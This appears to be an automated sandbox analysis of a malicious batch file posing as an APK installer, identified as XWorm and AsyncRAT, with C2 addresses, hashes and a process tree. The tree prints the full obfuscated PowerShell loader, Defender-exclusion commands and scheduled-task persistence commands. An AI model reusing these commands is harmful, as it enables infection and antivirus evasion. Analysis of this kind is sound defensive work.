Overview

overview

10

Static

static

1

APK-installer.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    47s
  • max time network
    47s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    29-05-2024 20:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    APK-installer.bat

  • Size

    442KB

  • MD5

    52709a177ea05374516eae946c3f800d

  • SHA1

    f8a17588756941fca054402b1d32770d22b63d1e

  • SHA256

    d9bf2b9cf084edc7ea54d3bc7facd312951b434f8e64b712a8233c113da7d881

  • SHA512

    35caadb87ac6e6853aab7818672e5509919c216e5ca51bc98d6156aca5a199f436196dcdc2bb6b45b15c824f811643630c7cbfe522202f835efdf6cc2a355ebb

  • SSDEEP

    12288:zSDnZG9iQNJTvPA+/P3PIN/0Hl+SZK2jUG7O:onONJk+Xwh2ly2NO

Score
10/10
asyncratxwormdefaultexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

19.ip.gl.ply.gg:38173

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Runtime Broker.exe

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

147.185.221.19:38173

Mutex

uuhaiushdishajkdhwuasudh

Attributes
  • delay

    1

  • install

    true

  • install_file

    svhost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Async RAT payload 1 IoCs
    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

    execution
  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\APK-installer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2892
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HKpM+MBCuE/wlYaN2z/DvAVm3pCgflW2mkVPWFmqfPg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d/N2APtjUjErXNR+ZLigRg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $yTnJn=New-Object System.IO.MemoryStream(,$param_var); $eUYRj=New-Object System.IO.MemoryStream; $oMWJO=New-Object System.IO.Compression.GZipStream($yTnJn, [IO.Compression.CompressionMode]::Decompress); $oMWJO.CopyTo($eUYRj); $oMWJO.Dispose(); $yTnJn.Dispose(); $eUYRj.Dispose(); $eUYRj.ToArray();}function execute_function($param_var,$param2_var){ $RZQgO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NRzTU=$RZQgO.EntryPoint; $NRzTU.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\APK-installer.bat';$irigc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\APK-installer.bat').Split([Environment]::NewLine);foreach ($LYNsH in $irigc) { if ($LYNsH.StartsWith(':: ')) { $NJfxg=$LYNsH.Substring(3); break; }}$payloads_var=[string[]]$NJfxg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4252
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_772_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_772.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_772.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4928
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_772.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3592
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HKpM+MBCuE/wlYaN2z/DvAVm3pCgflW2mkVPWFmqfPg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d/N2APtjUjErXNR+ZLigRg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $yTnJn=New-Object System.IO.MemoryStream(,$param_var); $eUYRj=New-Object System.IO.MemoryStream; $oMWJO=New-Object System.IO.Compression.GZipStream($yTnJn, [IO.Compression.CompressionMode]::Decompress); $oMWJO.CopyTo($eUYRj); $oMWJO.Dispose(); $yTnJn.Dispose(); $eUYRj.Dispose(); $eUYRj.ToArray();}function execute_function($param_var,$param2_var){ $RZQgO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NRzTU=$RZQgO.EntryPoint; $NRzTU.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_772.bat';$irigc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_772.bat').Split([Environment]::NewLine);foreach ($LYNsH in $irigc) { if ($LYNsH.StartsWith(':: ')) { $NJfxg=$LYNsH.Substring(3); break; }}$payloads_var=[string[]]$NJfxg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2416
            • C:\Users\Admin\AppData\Roaming\XClient.exe
              "C:\Users\Admin\AppData\Roaming\XClient.exe"
              6⤵
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4516
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4768
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:3804
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:2120
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:3452
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
                7⤵
                • Creates scheduled task(s)
                PID:1076
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /delete /f /tn "Runtime Broker"
                7⤵
                  PID:4424
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDF06.tmp.bat""
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2852
                  • C:\Windows\system32\timeout.exe
                    timeout 3
                    8⤵
                    • Delays execution with timeout.exe
                    PID:3404
              • C:\Users\Admin\AppData\Roaming\Client.exe
                "C:\Users\Admin\AppData\Roaming\Client.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:848
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svhost" /tr '"C:\Users\Admin\AppData\Roaming\svhost.exe"' & exit
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2116
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "svhost" /tr '"C:\Users\Admin\AppData\Roaming\svhost.exe"'
                    8⤵
                    • Creates scheduled task(s)
                    PID:1452
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4873.tmp.bat""
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4888
                  • C:\Windows\system32\timeout.exe
                    timeout 3
                    8⤵
                    • Delays execution with timeout.exe
                    PID:1192
                  • C:\Users\Admin\AppData\Roaming\svhost.exe
                    "C:\Users\Admin\AppData\Roaming\svhost.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:3012
    • C:\Users\Admin\Runtime Broker.exe
      "C:\Users\Admin\Runtime Broker.exe"
      1⤵
      • Executes dropped EXE
      PID:4360

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      df472dcddb36aa24247f8c8d8a517bd7

      SHA1

      6f54967355e507294cbc86662a6fbeedac9d7030

      SHA256

      e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

      SHA512

      06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      4914eb0b2ff51bfa48484b5cc8454218

      SHA1

      6a7c3e36ce53b42497884d4c4a3bda438dd4374b

      SHA256

      7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e

      SHA512

      83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      af4aedf16837b914f227b499e60f3f67

      SHA1

      a7455d25a466c2462a12296b2fc12dbd6cfd7fea

      SHA256

      2fe359a8fcd7d1ed8ee7c9cd1e210cf91a7eedb23492131983ff75830d7d5529

      SHA512

      61a737a7d69a7fbad54f28ee3829063e1af280cd0d75aa5ef1a4d5e071b52694629c87c4aa583693eb321b4db1a1bcbc94f7169987fd35cf7fecb63409dec428

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      5beee13e58b6e28c4e22691829748cf7

      SHA1

      d8708b5a2923a9b7dfa9a944481084e75cf05707

      SHA256

      40c09912b3d23b061704a66edf6500ad7866562ee0a459dc9a91dcc41c0295a6

      SHA512

      7266a0df64f7abc9ce157892e094d03880acd26fe67172b83393623718dd1d548b0bd051c4e808a06f77ad2897b2619035910e24c4c2418271ae1727fdd4b497

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      0aa84adece4d53cfe9d8e5b2921311f9

      SHA1

      6c8959f7b4100936cb5560102b102b9d81576ae5

      SHA256

      aa8c8795c94824109bd97f6a55a564ab347005adbe77c8ee39925cebcec3cf58

      SHA512

      1539dc85914e6f887e9f0ff72afe361fb4f84d3901c60cdf8b25279ba52ef4b5e272ea1eca9e7bd603c607acfe8edb86c0d62fd5adf520d1b88be76fab8abe2e

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      1a9fa92a4f2e2ec9e244d43a6a4f8fb9

      SHA1

      9910190edfaccece1dfcc1d92e357772f5dae8f7

      SHA256

      0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

      SHA512

      5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_103ebfls.jjp.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmp4873.tmp.bat
      Filesize

      150B

      MD5

      67cdf9c753a7d3f9388e4cc6e2e81572

      SHA1

      52785cc6ed14182ebfc27b6272b8af319a725160

      SHA256

      cc33f1b3b241d086c7e99386b0fe8f9f13ab7f003fe92bedd3a7fc77b84198f7

      SHA512

      17234197fab72b079638b88ef8d3cbdb4ac71c61edbe501086d8a402971212838874a52554a1e1f7eaefbf31e5a18ea68fa8d236c01aa0a27751993be4ac90a4

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmpDF06.tmp.bat
      Filesize

      156B

      MD5

      878e9ab9187e427f701e6eb9333fcfae

      SHA1

      e1f467307ba6576dde276a6cb4188222baf3d6c4

      SHA256

      3c63b71b1de76315376219a1ba21e88e098edc2c3b8196256c5179fe69c870cf

      SHA512

      2ccde92b49dc9fd744e7e39dc4cbf3d83df3044de4c6686442cbf1080cf4413e6e93a1978ad0632306d380cdfcfc5eae02107a822c6640ebdf57b44e4880a32f

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Client.exe
      Filesize

      74KB

      MD5

      c9e368cb65ed6c541e29b52aeb4c2af4

      SHA1

      b2fe42b7ee53d11cc6cac3e6a99a92f72ff9cc01

      SHA256

      255569d7156794ac033567269a847e93acdfc95126dbad54af5b8909bba4c553

      SHA512

      10ad380013e2efa9f85110e97ebb1187c22fadc2b43f6633af65aedb3b9ffc0355695a70858eef8a6d819423778552f17ebaeeb19ba3b521da2584a9f1e74b81

      Download Submit

    • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
      Filesize

      8B

      MD5

      cf759e4c5f14fe3eec41b87ed756cea8

      SHA1

      c27c796bb3c2fac929359563676f4ba1ffada1f5

      SHA256

      c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

      SHA512

      c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\XClient.exe
      Filesize

      71KB

      MD5

      5eb91245fb4e7f439103d44b2c4a06b1

      SHA1

      83df34cbf18b00790d09ed92aa870b8a64006629

      SHA256

      f3d4ef95f90f8da2b52fb08ad9daf6cceeacef3c4d44e4af510a4624de1aeb84

      SHA512

      256f22759e037ce813a4737040c34e946bea41d6bf528a171f846e79790eebbeef13f2e4965566fbd6eb2274f0f22b75323aa85d82625e15f0dea7936dab9ec3

      Download Submit

    • C:\Users\Admin\AppData\Roaming\startup_str_772.bat
      Filesize

      442KB

      MD5

      52709a177ea05374516eae946c3f800d

      SHA1

      f8a17588756941fca054402b1d32770d22b63d1e

      SHA256

      d9bf2b9cf084edc7ea54d3bc7facd312951b434f8e64b712a8233c113da7d881

      SHA512

      35caadb87ac6e6853aab7818672e5509919c216e5ca51bc98d6156aca5a199f436196dcdc2bb6b45b15c824f811643630c7cbfe522202f835efdf6cc2a355ebb

      Download Submit

    • C:\Users\Admin\AppData\Roaming\startup_str_772.vbs
      Filesize

      115B

      MD5

      ba400a3afee928e1d170558afc479631

      SHA1

      ef9e596175d3622554012815aa45ff731ff89b63

      SHA256

      7c40640e3de5edcaadc6c822be0fe0c567468f9d7b4509d9fef6d779aa32640a

      SHA512

      b9eae8e441a6674ab2016461d1b10d806329995ec82a903e77dd77b014f894bc8fa49bb2ff9f402bf5f70ed436fbaf628f4c1712c715c2edcba08c95a3e24cf4

      Download Submit

    • memory/848-73-0x0000000000D30000-0x0000000000D48000-memory.dmp

      Filesize

      96KB

      Download

    • memory/2332-24-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2332-27-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2332-30-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2332-26-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2332-25-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2416-48-0x000001DAAE270000-0x000001DAAE29E000-memory.dmp

      Filesize

      184KB

      Download

    • memory/4252-12-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4252-14-0x00000214FEDA0000-0x00000214FEDF6000-memory.dmp

      Filesize

      344KB

      Download

    • memory/4252-13-0x00000214FE9F0000-0x00000214FE9F8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4252-0-0x00007FFF10393000-0x00007FFF10395000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4252-11-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4252-10-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4252-128-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4252-132-0x00007FFF10393000-0x00007FFF10395000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4252-9-0x00000214FEB10000-0x00000214FEB32000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4516-62-0x00000000009E0000-0x00000000009F8000-memory.dmp

      Filesize

      96KB

      Download

    • memory/4516-129-0x000000001BF30000-0x000000001BF3C000-memory.dmp

      Filesize

      48KB

      Download